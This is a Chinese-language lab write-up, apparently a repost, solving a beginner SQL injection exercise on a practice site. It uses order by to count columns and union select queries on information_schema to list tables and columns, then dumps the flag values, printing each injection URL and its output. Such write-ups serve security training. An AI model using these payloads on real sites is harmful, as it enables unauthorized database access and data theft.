SQL注入-显错注入Rank 1

发布时间:2024-03-14 19:01

链接
http://inject2b.lab.aqlab.cn:81/Pass-01/index.php?id=1

\"SQL注入-显错注入Rank1.首先找注入点:
http://inject2b.lab.aqlab.cn:81/Pass-01/index.php?id=2-1
id=2-1在数据库执行了,找到注入点
\"SQL注入-显错注入Rank
2.利用order by猜测字段数
如下,当order by 3能正常返回数据 order by 4无正常回显,说明字段数为3.
\"SQL注入-显错注入Rankorder by 4如下:
\"SQL注入-显错注入Rank
3.利用联合查询 union获取数据库信息
如下:回显在 2,3位置
\"SQL注入-显错注入Rank
3.1 接下来获取当前的数据库名:
当前数据库名为:error

\"SQL注入-显错注入Rank
3.2 接下来获取表名
http://inject2b.lab.aqlab.cn:81/Pass-01/index.php?id=1 and 1=2 union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1
error_flag
http://inject2b.lab.aqlab.cn:81/Pass-01/index.php?id=1 and 1=2 union select 1,2,table_name from information_schema.tables where table_schema=database() limit 1,2
user

获取error数据库两张表 error_flag,user
\"SQL注入-显错注入Rank

3.3 接下来获取字段名
http://inject2b.lab.aqlab.cn:81/Pass-01/index.php?id=1 and 1=2 union select 1,2,column_name from information_schema.columns where table_name=‘error_flag’ and database()=‘error’ limit 0,1-- qwe
字段1:Id

\"SQL注入-显错注入Rank
字段2:flag
http://inject2b.lab.aqlab.cn:81/Pass-01/index.php?id=1 and 1=2 union select 1,2,column_name from information_schema.columns where table_name=‘error_flag’ and database()=‘error’ limit 1,2-- qwe

\"SQL注入-显错注入Rank
字段3:木有
http://inject2b.lab.aqlab.cn:81/Pass-01/index.php?id=1 and 1=2 union select 1,2,column_name from information_schema.columns where table_name=‘error_flag’ and database()=‘error’ limit 2,3-- qwe

\"SQL注入-显错注入Rank
3.4 获取error_flag表的数据
http://inject2b.lab.aqlab.cn:81/Pass-01/index.php?id=1 and 1=2 union select 1,2,flag from error_flag limit 0,1-- qwe
zKaQ-NF

\"SQL注入-显错注入Rank
http://inject2b.lab.aqlab.cn:81/Pass-01/index.php?id=1 and 1=2 union select 1,2,flag from error_flag limit 1,2-- qwe

zKaQ-XiaoFang
\"SQL注入-显错注入Rank

ItVuer - 免责声明 - 关于我们 - 联系我们

本网站信息来源于互联网,如有侵权请联系:561261067@qq.com

桂ICP备16001015号